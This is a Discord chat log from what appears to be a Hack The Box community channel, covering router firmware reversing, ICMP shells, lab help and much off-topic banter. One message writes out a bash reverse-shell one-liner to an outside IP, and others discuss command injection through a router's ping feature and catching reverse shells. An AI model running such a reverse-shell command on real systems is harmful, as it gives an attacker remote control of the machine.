#general
1 messages Β· Page 283 of 1
yeah well, ping doesnt exactly allow you to do RCE a lot does it?
UART disabled for this one
mb
it does if there's a command injecting
reverse shell by ICMP can be quite goated
Not very usable though
I'mma go ahead and help him stop talking...
also apparently we should stop talking about whatever networker is doing
Brooo, you reminded me of Geohots trynna get a shell over ICMP while doing a HTB machine it actually seemed doable for a moment, that man actually revesed ICMP just like that
New pull request made on the HTB SDK 
Eh, this type of stuff can be pretty useful
Now I am nostalgic
It'd be so funny if it was just a typo fix

but to be that a good and re-do ICMP with python on the fly
is so cool
In high school I used to do a TCP2ICMP so I could bypass the library proxy, that didn't allow us to use the internet for more than 1 hour at a time
It's an age thing
GOAT
No, I think this is an API bug but it doesn't fetch unreleased machines if you don't specify any states. I also updated documentation
Petal serial your knowledge to me brain right fucking now
I can do better honey
π
That's actually cool
oh I am bad with the PG13 stuff sorry
LMAAAO
lol
Get hiimmm
It's only like my 3rd pull request on the repo π
I am just bored:
[-] Attempt 2462: RW+0x119b0 (LADDR 0x5bcd0) - Fail
My second one got merged which was really cool
I was hoping attempt 1337 would be the last
*makes a pull request*
Re-wrote entire SDK in Rust.
if the 69 attempt failed, the rest would
just saying
sir you just took down cloudflare again
hey man, it's not my fault cloudflare decided to ignore warning
literally anytime you use unwrap compiler will go: ok fine but I'm warning you...
That's actually a good rule of thumb
no cap
Also keep the chat PG13 please
@carmine pecan teach me your ways
You did try a newline right?
oh yeah, i sure did
but the thing is its not using the ping binary
Ok ok, had to check haha
It never does
Yeah
Damn
It was just bugging me
i mean you could turn it into a csrf but...what would be the point of that?
but im buying a latest one tomorrow to practice
yeeep i could dump it
UART just get you into a locked shell
it turned out the RX/TX pins could be anywere and not just next to each other
I was thinking more looking for an update bin online
so i just tooked the multimeter and checked each hole i could find
Ilovemicrowave
But I'm probably just repeating what you've tried already
aaah the get ther firmware put a cron and get a shell maybe
nonon i havent done that yet
felt like cheating
Nah firmware to inspect the API you're posting to
API as in might be an HTB labs API bug. I'm not entirely sure.
aaah nono, its not even an hour now that i'am trying this
iirc most routers have a way to get into another shell which allows you to reset the elevated password
Ya looks to be HTB problem π
just now remembering that probably also means reseting the entire router config
its not satifying enough if you dont have (root), when you do whoami
can anyone who is skilled at crypto tips me some books or sources I can learn from
crypto is just math so what you're really asking is: how to get good at math

by crypto do you refer to cryptography or something else ?
Really π€¨
cryptography
yes i sec
?
I found that useful ages ago
(free course at Maryland)
TP-LINK TD-W8961N (UN)
what I'm saying is: learn the math behind it
if you want a book i did Cracking Codes with Python by AI Sweigart
Yep, firmware available to download
and thats why im asking for good sources or books that talks about the topic cryptography
I had some great fun reversing some update APIs on my telescope the other day
it actually teaches you to code and also, goes though the basic maths and all that
are you the author
BEen working through that to help reverse the updates they made to the APIs
for some IOT device ?
Dwarf 3 Telescope
Machine IDs going up by 3 is a very interesting design choice tbh.
Well yeah I've got the binaries for the API server that the Dwarfalp drivers communicate with
Just gotta spend time documenting the APIs if I can, but it's anything but simple π€£
I'm way out of practice
They changed the API spec a few updates ago
and that broke the open source Dwarfalp driver which lets you hook the scope up to a variety of control software
so you don't have to use their Android app
Anyone be able to provid assistance for eighteen. I pretty much have the path to root. I'll explain in a PM.
Sorry my b didn't see I was in the wrong place.
dammmmmmmmmmmmmmmmmmmmmmmmmmmmmn
Hm, quite a few interesting articles on that family of routes heathers
Some of the tooling is not immediately available, but I'm sure there's a fork somewhere on github
Yo g0b, may I dm you?
Yeah sure

π§ββοΈ
hmmmmmm, intresting i've found a lead to that ping thingie
coudlnt get a valid gzip or get the backend because its some wierd mips thingie ?
Damn i need to suckless at this
I mean with binwalk you can get something of use
Just looking for the cgi bin now
Could be that's just an incremental update image
so perhaps that cgi bin isn't even there
Anyway
There was a buffer overflow DoS vuln raised I could see
So if someone took the time to find that
likely they would've found a way to inject into the ping / resolve if it was vulnerable
So likely it's not
That was fun
Hello, how are you? How's everything going?
Felt the same about Control: Resonant
i did something else ..., i used dd and got the lzma compressed files, and did strings and got the lines where <html is at,a dn read the chunk where i could find </html to get the exact html pages, ...
hey its not stupid if it worked
yup
If it works it works
binwalk -e -M -Z router.img
That'd decompress for you too
yeah for most cases but they using some wierd compression that idk what it is
jesssuuuuuuuuuuuuuuuuuuus
You'll get a load of HTML forms from that
dd is the disk destroyer bruh
That's one of the articles I mentioned btw https://piotrbania.com/all/articles/tplink_patch/
hacking and patching tp-link TD-W8901G router
Nice read
tp-link is backdoored chinese grabage
like when i got stuck here i did my method to get the code
Hey you're not wrong
thats a veeryy old oone
Hey G0blin may i dm you?
Damn ubuntu unity used to look so nice
Afraid I'm about to head to bed
Could another mod help perhaps?
Not that I'm a mod
But you know what I mean
yea
good night red gandalf
nn π
Oh lol
@tame gust https://www.tp-link.com/uk/support/gpl-code/
TP Link - GPL Code Center
Not much different, just all zipped up and HTML in /userspace/private/apps/httpd
That makea helllaaaa sence nooow
My router is tplink as well
archer a9 model
Juniper > TP-Link
the config page on 192.168.0.1 kiiiind of looks insecure but I've never tested
better replace that asap
why?
spyware
I haven't seen any backdoors or other suggestive mechanism on it
and I looked in the firmware for it
you also said you didn't look didn't you lol
jessssuuuuuuuuuuussssssssssssssssssssssssssssssssssssssssssssssssssssss
smash that thing with a sledge hammer immediately
then
put it in the microwave
and nuke it
π€£
Its getting old anyway so I probably will
i just can't trust tplink
and be sure to drill through everything
I've been using this router for like, 5 years now
use Juniper instead
bad luck
it's time for it to go
when it's gotta go, it's gotta go
hahaha
yup
i just use asus at home for my router
also changing ISP because mine's been shit recently
work uses sophos or fortinet
might as well change the router too
sophos kinda cheapo garbo
Juniper > Sophos
not my choice unfortunately
I bought some
used Juniper appliances
for quite good prices
I'm building my 12ru server rack
because of all the prince increases my work started buying gmktec instead of nucs too.. ugh.
oh ok
+500 social credits
πΌ π€ π¦
improved 400 points in SAT after wearing new glasses 
πΌ βοΈ π¦
Tp link is here in nepal also
But I feel it's trash
I dont use tp link
I use wordlink
Huawei π₯

English plese

@west venture want a sprite cranberry?
sprite cranberry with pineapple soju is good
Ja
Morning
thats actually some really good luck
I was just about to start Operation WoloDailyPing, but it might be too early
I don't use pekka bruh
yeah, makes sense
These are my 2 main decks right now
I should change my deck tbh
my decks are just to high in elixir
and I have to change em
I fw classic splashyard heavily but it's not that great right now
magic archer tornado deck used to be fun to use

Greetings fellow young people
Not young anymore but greeting 
Has anyone doing boxes with raspberrypi ? kali os arm ?
I will digress
yo, echo, can I send the DM today? my standardized testing ended today, so I can send it π
Please
What?
I see
not graveyard
I imagined something else.
loool
cause it ragebaits ppl
ah
an angry opponent is the loosing opponent
I just have lvl 14 min pek and witch that goes ccccccccrrrrrrrrrrrrraaaaaaaaaazzzzzzzzzzyyyyyyy
you keep playing, keep developing cards, thats the strat apparently lol

Where I can get the pass of root of pwnbox
C:\Users\Administrator\Desktop
Kali Pwn box
Bruh
Hack the box .
pass of root.
I can see default user on my_credentials.txt
But not for root
You mean privilege escalation?
you have to gain root priveleges
thats the box
Does anyone know why I can't connect a vpn? I'm working on Archetype machine and yesterday I could work, but today it seems all vpns are offline.
download the correct .ovpn file and try to connect using sudo openvpn labs_username.ovpn
I downloaded the file yesterday, connected and everything was alright. Today, the servers are offline.

Welcome to the HTB Status Page
Looks fine on there
all green 
i guess bro turned off the target machine and pulls an incorrect .ovpn profile 
I can't put a screenshot here on discord.
I believe you gotta be at least hacker role to send images
Skill issue
I used to be able until today

Can't respond right now, I'm listening to fit for an autopsy right now. Contact HTB support for help
use sudo to respond
π₯
command not found
hi fellas
ye
That is your usual response
@mystic harbor get pinged
I will ping you tonight while you sleep
@austere sinew
Wolo is busy
She said sheβd be at bsides
and only like 11 AM
London yes
Iβve never been to one. Maybe next year
I just watched final destination bloodlines and now I'm wary of switching on the microwave 
Where are you from donut
No worries lol
@mystic harbor I saw that 
So did I

there's cyber events in NK 
/j
One of my clients employees went to NK recently iirc
huh
its very difficult to go, yeah
He travels to crazy places
does he have a bodyguard?
But at least I beat him to visit Chernobyl and Mt Everest
LOL
I visited before they put the new sarcophagus over the site
Was fun to carry a Geiger counter
But that was like ten years ago lol
Any recommended places to visit in SK @cerulean bloom ?
Saw what
Hey i dont have a vps any other method to get rev shell like i tried ngtok but in order to listen ngrok 4444 it requires card details but it shows error any other alternatives ?
not really lol
lotte tower + lotte world is good
everland, uhhhhhh, dongdaemoon
Huh? For HTB?
Hey I was doing the monitourfour machine on HTB and not itβs unresponsive and I cannot reset it (I have already done this once for today ) . What am I suppose to do now ?
You don't need a vps for HTB just use a VM and the openvpn file
Β―_(γ)_/Β―
It takes a bit for the services to start and check your openvpn connection
try again
Gday Melbourne
Melbourne is the machete capital of the world sir
it is worse than
Johannesburg
every 5 minutes
someone gets stabbed
mugged
or robbed
it's a beautiful day outside, a nice day to get stuck on an hard box for 4 hours straight
Wait I recognise the name ceald
how much is a little bit?
on a good day with no rain i can do hard AD boxes maybe
cool
I might be a little bit experienced with it 
I see
well
I'm thinking
if I have admin on the domain controller
I should be able to create admin account on the lower tier machines, right?
you need to be a domain admin in order to do that, DC admin is not enough
Why would you want to make local admin accounts is the real question
it's part of the lab I'm doing
I thought
I could do that
instead of having to go back
and mess around finding access another way
cool
Pretty sure you can disable local admin group on machines with the domain admin account
yo where do yall live
Cambodia
dangerous
Vietnam is much safer
except if you're a tourist
thieves will spike your drinks
im not trying to get into the actual discussion but is it not normal to talk ab ethics, religion and politics in public at bars
and then try to rob you
North Vietnam is goated
could be
it depends
im in the us but every is always so mad i feel like it dumb
we should be educating eachother
you dont sound american
approximately 50% of the global population is dumb
most people are stuck in never ending while loops
π
π
bro if i go to a bar im not asking u those dumb quetions ab how ur life is doing

bro you are not american
i wanna know ur lore and why u think a certain way
you are not american
you should assume you will meet drunk people
small talk is so dumb
i am american lmao
no you are not
if you prefer to avoid risk
stay home
in your lab
or whatever it is you have at home
i feel like this is an american thing
do europeans do this
bro i hack to much
yeah
i wanna be social
that's because you're elite
yeah
but other people might not want the same thing
π€
is this not like human tho
you shouldn't really expect much value from meeting random drunk people at a bar
i thought we learn from eachother instead of doing some weird gatekeeping
idk bro im autistic idk how to talk to ppl
you should set your expectations clearly
I'm autistic too
you are not american Levy
who is levy?
Iβm witnessing professional neetage right here
bro that said is american
im not levy?
that is not a philly thing
Hoi bsides today
@turbid goblet are you a pirate sir?
@supple plume
@meager kernel
yep, have fun!
Tyty
if I use
burp suite pro
will that make me a pro?
dammmmmmmmmmmn
that's honestly so professional
i have pro
nothing makes you a pro 
I have Threadripper
lies
Threadripper > BurpSuite Professional
@austere sinew ||packing||
show me proof and send it my house so i can verify
128gb ecc ram
nah
why should i show you proof?
are you the workstation police or something?
bc i am him
paul
no that is sin mascaras
π€£
Hello
I'm not sure who sin mascaras is
me
I remember watching wrestling as a kid
No L for Love π©
love is just a chemical reaction in the brain sir
yeah
he's weak as piss
bailing on the crew
bro doxxed himself
You like wild?
I dox myself all the time, except with fake info as decoy
love it nurgah
cant work on me
WHERE
surely not sir
Halloooo
Everywhere
hallloooooooooooooooooooooo
hΓ€lΓΆ
I never see daylight sir
I live in my lab
sleep all day
ayo
Bad
i screenshoted that
wake up at approximately 20:00 hours every day
aint going back
Okay
pre is for weaklings
like those who delete their messages
not really
Your heart is gonna give up soon
I have a nootropic blen
no it wont
just take meth
I have a good diet
best pre
He trains his heart to failure
But not a good life
Mike Menzter split
dammmn
Training heart to failure
that's one big nurgah
do exercise too
my heart is strong
I was a swimmer as a kid
3 times per week
so
why not now
thanks for that info
I'm quite fit
fight me
nah
and do you do them?
you're not even a challenge bruh
for the threadripper
Vro Needs to study biology
get exposure to sun too
I'm studying cyber at university
do you also socialize?
I don't know what that means
i want to stay pale
cool
socialize
yeah
converse with real people
nah
converse?
real people are fake
thats deep
I have no time for socializing
jesus christ
if I was to go out socializing and partying every weekend
I would fall so far behind in my work
that's not acceptable sir
Socialize does not mean partying
yeah
it means to talk with people
and make real friends
like you are rn
I talk with everyone
Inspiring dedication. I think the same thing and go ahead and engage with a distraction anyway 
there's no such thing as real friends
yeah
deep
it happens

you have not met them yet
facts
hostias
could be
Me cago en su puta calavera
Mierda ya ostia
los meurtos
dammmmmmmmmmmmmmmmmmmn
English
I am a pentest monkey sir
i no no u
Kali Lincox bashed me
with a reverse shell
bash -i >& /dev/tcp/10.10.10.10/1337 0>&1
dude
how
you stay deleting
"Ive got some alcohol and pills, but, I promise I wont kill myself"
then
a few weeks later
I found out that
she was dead
stop what?
I'm being serious
you don't honestly believe that I'm making this up do you?
the world is made up
I mean
Vro the police is here
I don't think it is
^
What if get me too π
they could set you up
what if what get you?
@mystic harbor
whos trolling
I was honestly being serious about my neighbor
@mystic harbor sorry
If someone texts from my phone act normal guys π
I thought you guys were trolling
he got muted lol

what is inpisre
bro is finally hunting on nasa
good job
I know you're reading all the disclosures, I do that too
just reading the reports
helps inspire
quit trolling
also this is nothing compared to some of the other ones I've seen 
my bad
like "THIS IS VALID AND U HAVE TO ACCEPT IT" written in disclosure request

uhhhh
responsible disclosure is a thing
I tried it once
I called up the company
which manufactures my washing machine
because they have a vulnerability disclosure program
I politely advised them that I thought I had found a vulnerability in the machine
next thing I know I've got some crazy woman yelling down the phone line at me falsely accusing me of attempting to extort them
so wild
I was honestly so shocked, couldn't believe this bullshit
Leak it
now, I make sure to do everything by email only, because, in this way, no one can falsely accuse me or anything
responsible disclosure is a thing
Be irresponsible
no
wtf
sue them or something 
you guys know what a 5.25" floppy disc is, right?
You passed the test now you are fired
do you have any idea how expensive legal costs are?
clearly not
I just remember echo was pinging
π€£
what is a nigesh?
Why are u in vc
No, Im showing I put some cockroach on ignore mode
dammmn
πͺ³ πͺ³ πͺ³ πͺ³ πͺ³
π
that's kind of toxic don't you think?
I got enough of it
dammmm
hi hru
What's that?
you're joking, right?
Trying to decide what i wanna do atm
or what to hunt for bugs for
dang thats insane deal
want to help me debug windbg? I got my phone connected and still not able to figure out how to set breakpoint
game pass is good
bp ADDRESS

Thanks
it might not be hitting what needs, like conditions not met
welcome
might not
this is true
Frosto anxiety is high since i keep refreshing my email for these bugs to get approved or paid
I just disconnected and reconnected the device, and it got a fresh address. turns out the previous one was stale so the BP never hit lol
Just turn notifications on and do something else
If I was in murica I would go to a shooting range
this was good to read
indeed
my GPU has
haha
192 matrix cores
oh I thought you meant in murica
how many matrix cores do you have kind sir?
honestly... idk
well well well, look who it is
I am not much into hardware
you'd know
if you don't know
you probably don't have any
ββ[eof@archlinux]ββ[~]
βββΆ grep -c ^processor /proc/cpuinfo
16
seems like 16
processor?
yeh
16 cores is nice
matrix cores are separate execution units inside the GPU
like
tensorcores
except made by AMD
not Nvidia
I have Nvidia
hahahah
don't blame me
I just got this computer because it was a good deal
What are Matrix Cores?
β’ Special purpose hardware that performs general matrix multiplications
(GEMM)s
β’ Accelerate matrix multiplications with a new family of Matrix Fused Multiply
Add instructions (MFMA)
β’ Support mixed precision
β’ Achieve more FLOPS/cycle when compared to vector units
like 800$ discount
yeah
like 50%
you are hurting my mind
ok
why would you buy something off the shelf?
are you telling me
it's not custom made?
He got second hand
jesssuuuuuuuuuuuuuuuusssssssss
how many backdoors could be hiding in the uefi?
Don't know
what's wrong with that, I don't have that level yet
level?
I mean you can laugh at me
dude
but you called me toxic for less
how
bruh
no seriously
you don't require any special skills to build a computer
I took my computer apart when I was 12 years old just so I could figure out how to put it back together
you've got chat gpt
it can provide advice
on which hardware is most suitable to your use case
right
well Ill look it up in about a year
at the moment I can't afford to buy another computer
uhhh
It's not that I don't like Nvidia
It's just that
my GPU serves my use case more appropriately
if I just write code
god i missed the irrational malding that happens in this channel
I don't need much
how?
I mean doesn't it need a lot of ram memory? do you run it on disk or something?
or many small models concurrently
my gpu has like
with swap memory
48gb of vram
no
48gb is huge
for vram
yes
but then there is like
I guess way more than that
yeah
but what do you do in general
with your computer
do you do cyber or other stuff?
you didn't say that to me
I think I did
maybe to someone else
I must be mistaken

yea
why are you
taking screenshots of what I wrote?
he wasn't talking to me
I'm not scanning this chat 24/7
to confirm that you said it before
Kinda strange
what is?
kind of out of pocket to appear out of no where and then insinuate that I'm "strange"
he could've been talking about me
is what I assumed anyway
@austere sinew hi + ping
could be
wuts happening lol
Itβs going great now setting off to bsides I woke up late lol
or he could've been talking about something else entirely who knows
like thinking aloud
I dont look too deeply into anything anyone says
because I could be entirely wrong and its happened before
thats why I didn't reply 
This
Strange to audit the chat history like that and give it out of context to what the convo was
in that case: I was confirming that he had mentioned that he's a uni student before, lol
because I remembered it and assumed the other guy was in the chat at that moment as well
yeah
I think it's kind of rude
It's not up to you to decide who or what is strange


